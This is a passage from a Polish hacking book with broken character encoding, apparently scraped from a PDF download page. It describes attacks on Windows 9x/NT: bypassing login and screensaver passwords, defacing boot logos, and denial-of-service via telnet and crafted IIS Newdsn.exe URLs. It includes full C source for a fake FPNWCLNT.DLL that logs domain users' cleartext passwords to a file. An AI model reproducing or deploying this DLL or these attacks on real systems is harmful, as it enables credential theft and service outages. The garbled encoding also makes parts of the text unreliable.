[ Pobierz całość w formacie PDF ]
.S³abe punkty£amanie hase³Has³a logowania do systemuStreszczenie: Zlokalizowanie i wykorzystanie pliku hase³ mo¿e umo¿liwiæzalogowanie osobom nieuprawnionym.Stan po ataku: Nieautoryzowany dostêp.Podatnoœæ: Win 3x, 9x.Luka: Jedna z podstawowych technik w³amañ opiera siê na znajomoœci sposobuobs³ugi pliku danych logowania, *.PWL, przechowywanego zazwyczaj w katalogu\Windows (patrz rysunek 9.5).Symbol gwiazdki jest tu odpowiednikiem nazwylogowania u¿ytkownika, zwi¹zanej z jednym ze zdefiniowanych w systemieprofili.Rysunek 9.5.Wyszukiwanie plików .PWLProblem ten dotyczy wielu systemów stosowanych w firmach i przedsiêbiorstwach.Gdy u¿ywamy wielu profili u¿ytkowników, haker mo¿e pokusiæ siê o przeniesieniepliku.PWL do katalogu tymczasowego i zalogowaæ siê, korzystaj¹c z nazwyu¿ytkownika, bez koniecznoœci podawania oryginalnego has³a.Wówczas droga dokasowania plików czy modyfikowania ustawieñ u¿ytkownika stoi otworem.Pozakoñczeniu ataku plik nazwa_uzytkownika.PWL zostaje przywrócony.Mo¿na równie¿skopiowaæ plik.PWL na dyskietkê i z³amaæ has³o przy u¿yciu jednego z narzêdziopisanych w rozdziale 7.Owocem takich dzia³añ mo¿e byæ zdalne przejêciekontroli nad systemem, oparte na wprowadzonym po z³amaniu has³a koniutrojañskim.W przypadku systemów, gdzie nie stosuje siê profili u¿ytkowników,ekran logowania mo¿na pomin¹æ, wciskaj¹c F8 podczas inicjalizacji systemu ikorzystaj¹c z trybu MS-DOS.£amanie hase³ wygaszacza ekranuStreszczenie: Zlokalizowanie i wykorzystanie danych has³a wygaszacza ekranumo¿e umo¿liwiæ zalogowanie osobom nieuprawnionym.Stan po ataku: Nieautoryzowany dostêp.Podatnoœæ: Win 3x, 9x.Luka: Poprawka w danych powi¹zanych z ci¹giem ScreenSaver_Data umo¿liwi zmianêhas³a wygaszacza ekranu, a dziêki temu — uzyskanie nieautoryzowanego dostêpu dosystemu.Atak wymaga wprowadzenia modyfikacji w pliku Control.INI w przypadkuWindows 3x lub user.dat (w katalogu \Windows) w przypadku Windows 9x.Danehas³a zapisane s¹ jako szesnastkowe odpowiedniki nieszyfrowanych znaków ASCII.Hakerzy zatrudnieni w amerykañskich przedsiêbiorstwach lubuj¹ siê w nêkaniuprzyjació³ i wspó³pracowników „hakowaniem logo” (logo revamp).Jak ka¿dyu¿ytkownik Windows wie, przy ka¿dym uruchomieniu i zamykaniu systemuwyœwietlany jest obrazek (logo).Ka¿dy te¿ wie, jak zmieniæ tapetê pulpituWindows.Ten jednak atak prowadzi do zmiany obrazków uznawanych za „systemowe”.Wymaga kilku prostych czynnoœci.Po ominiêciu has³a wygasza ekranu lub logowania osoba nieupowa¿niona szybkowyszukuje i uruchamia dowolny program graficzny, jak Adobe Photoshopczy Paint.W okienku otwierania plików tego¿ programu nakazuje wyœwietlanie plikówwszystkich typów i przegl¹da katalog Windows w poszukiwaniu plików logo*.sys.Wnich bowiem zapisane s¹ obrazki wyœwietlane przy uruchamianiu i zamykaniusystemu.Osoba nieupowa¿niona w prosty sposób modyfikuje pliki, wprowadzaj¹c zabawnyzwrot lub symbol graficzny i zapisuje je bez zmiany nazwy.Przyk³adow¹,wprowadzon¹ w ten sposób, zmianê logo przedstawiamy na rysunku 9.6 (logozapisane jest w postaci obrazka „œciœniêtego” o 50 procent w poziomie).Rysunek 9.6.Zamykanie systemu Windows— nowe logoPrzechwytywanie plików hase³Streszczenie: Wprowadzenie fa³szywej biblioteki DLL pozwala przechwytywaæ has³aprzekazywane tekstem jawnym.Stan po ataku: Przechwycenie hase³.Podatnoœæ: Windows NT.Luka: Haker zastêpuje bibliotekê DLL w katalogu system32 w³asnym modu³empenetracyjnym, który przejmie has³a kontrolera domeny w postaci tekstu jawnego.Biblioteka FPNWCLNT dzia³a standardowo w œrodowisku NetWare i jestzarejestrowana w kluczuHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa.Do przejêcia hase³wykorzystuje siê jej „imitacjê” (patrz rysunek 9.7).Rysunek 9.7.Przeszukiwanie RejestruPo skompilowaniu przedstawionego poni¿ej modu³u penetracyjnego (FPNWCLNT.C)osoba nieupowa¿niona zmienia nazwê pliku na FPNWCLNT.DLL, po czym przenosi plikdo katalogu //system32 na podstawowym kontrolerze domeny.Kod mo¿e zostaæzmodyfikowany tak, aby has³a jawne zapisywane by³y do okreœlonego pliku, jakC:\\temp\\pwdchange.out:fh = CreateFile("C:\\temp\\pwdchange.out",fpnwclnt.c#include#include#includestruct UNI_STRING {USHORT len;USHORT maxlen;WCHAR *buff;};static HANDLE fh;BOOLEAN __stdcall InitializeChangeNotify (){DWORD wrote;fh = CreateFile("C:\\temp\\pwdchange.out",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,0);WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);return TRUE;}LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user,ULONG rid,struct UNI_STRING *passwd){DWORD wrote;WCHAR wbuf[200];char buf[512];char buf1[200];DWORD len;memcpy(wbuf, user->buff, user->len);len = user->len/sizeof(WCHAR);wbuf[len] = 0;wcstombs(buf1, wbuf, 199);sprintf(buf, "User = %s : ", buf1);WriteFile(fh, buf, strlen(buf), &wrote, 0);memcpy(wbuf, passwd->buff, passwd->len);len = passwd->len/sizeof(WCHAR);wbuf[len] = 0;wcstombs(buf1, wbuf, 199);sprintf(buf, "Password = %s : ", buf1);WriteFile(fh, buf, strlen(buf), &wrote, 0);sprintf(buf, "RID = %x\n", rid);WriteFile(fh, buf, strlen(buf), &wrote, 0);return 0L;}Doprowadzanie do upadku systemuPowa¿ny atak typu Denial-of-ServiceStreszczenie: Transmisja ASCII przy u¿yciu Telnetu mo¿e zak³Ã³ciæ pracêstandardowych demonów us³ug i spowodowaæ powa¿ne przeci¹¿enie systemu.Stan po ataku: Ca³kowita odmowa dzia³ania.Podatnoœæ: Windows NT.Luka: Hakerzy symuluj¹ proste procedury Telnetu na po³¹czeniach z portami 53 i(lub) 1031.Efektem jest 100-procentowe wykorzystanie czasu procesora,uniemo¿liwiaj¹ce dzia³anie wszelkich us³ug klienckich i zmuszaj¹ce do restartu.Wystarczaj¹ce jest wywo³anie serwera NT z aktywnym portem 53 lub 1031 iprzesy³anie losowych sekwencji ASCII (patrz rysunek 9.8).Rysunek 9.8.Unieruchomienie Windows NT przy u¿yciu TelnetuTen rodzaj ataku zwróci³ uwagê na dzia³ania grupy Underground — by³wykorzystywany do nêkania niezliczonej liczby serwerów WWW wprzedsiêbiorstwach, przede wszystkim tych, które samodzielnie obs³ugiwa³y DNS.Poza samym przeci¹¿eniem uzyskaæ mo¿na równie¿ efekt przepe³nienia dziennikasystemu (patrz rysunek 9.9).Rysunek 9.9.Dodatkowe konsekwencje ataku telnetowegoPowa¿ny atak typu Denial-of-ServiceStreszczenie: Odpowiednie skrypty URL mog¹ zak³Ã³ciæ pracê demona serwera us³uginternetowych Windows NT, IIS.Wynikiem jest odmowa realizacji us³ug.Stan po ataku: Ca³kowita odmowa dzia³ania.Podatnoœæ: Windows NT IIS, wersje 3, 4 i 5.Luka: Korzystaj¹c z przegl¹darki WWW, haker wysy³a odpowiedni skrypt URL,atakuj¹cy us³ugê aplikacyjn¹, w tym przypadku newdsn.exe.Wynikiem jestnaruszenie praw dostêpu skutecznie za³amuj¹ce pracê IIS.Ofiara mo¿ewygenerowaæ s³ynny „b³¹d aplikacji doktora Watsona” (patrz rysunek 9.10).Rysunek 9.10.Doktor Watson Ci pomo¿e.Serwer IIS mo¿e zakoñczyæ pracê od razu lub wygenerowaæ b³¹d przy próbierestartu.Przyk³adami „morderczych” URL mog¹ byæ:www.victim.com/Scripts/Tools/Newdsn.exe?Createdatabasewww.victim.com/Scripts/Tools/Newdsn [ Pobierz caÅ‚ość w formacie PDF ]